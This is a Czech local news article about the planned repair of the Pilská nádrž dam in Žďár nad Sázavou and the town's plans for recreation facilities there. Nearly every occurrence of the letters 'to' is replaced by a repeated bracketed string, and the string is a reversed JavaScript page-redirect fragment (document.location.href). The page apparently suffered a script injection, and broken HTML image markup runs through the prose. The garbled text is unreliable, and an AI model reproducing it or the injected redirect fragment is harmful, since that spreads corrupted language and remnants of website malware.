Žďár nad Sázavou, zdar nad sazavou, aktuality, hráz, Pilská nádrž, Pilák
Rainbow page separator

Povodí Vltavy opraví hráz Pilské nádrže

Sobota, 2. března 2013

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokoz-a-pilak-zdar-nad-sazavou-virtualni-fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-rc-mikrokopteru-dajc.jpg“>36549-<span style=[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokoz-a-pilak-zdar-nad-sazavou-virtualni-fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-rc-mikrokopteru-dajc“ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/36549-[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokoz-a-pilak-zdar-nad-sazavou-virtualni-fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-rc-mikrokopteru-dajc-300×200.jpg“ width=“300″ height=“200″ />Žďár nad Sázavou / V nejbližších týdnech bude zahájena oprava hráze Pilské nádrže. Inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem je Povodí Vltavy, náklady na opravu, která má být dokončena do závěru [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roku, se budou pohybovat kolem jedenácti milionů korun. Stavba, která zlepší zabezpečení téměř osmapadesátihektarové vodní plochy před povodněmi, měla být původně zahájena už loni, avšak termín byl posunut.

Pilská nádrž na okraji Žďáru nad Sázavou se využívá k rybolovu a k rekreaci; funguje tam au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokemping. Podle vedení žďárské radnice by oprava hráze neměla le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní turistickou sezonu výrazněji omezit. „Alespoň podle informací, které jsme dostali od Povodí Vltavy, bude jen o něco snížena hladina,“ vyjádřil se žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Ladislav Bárta.

Právě žďárská radnice pro příští léta chce podmínky pro rekreaci u Pilské nádrže výrazně zlepšit. Plánuje tam nechat postavit nový areál s hřišti, spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovišti, lanovými prolézačkami a dalšími atrakcemi. Žďárští na projekt požádali o dotaci – pokud uspějí, areál by měl být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tov do léta příštího roku.

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie-z-rc-mikrokopteru/“>Letecké fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tografie z RC mikrokopteru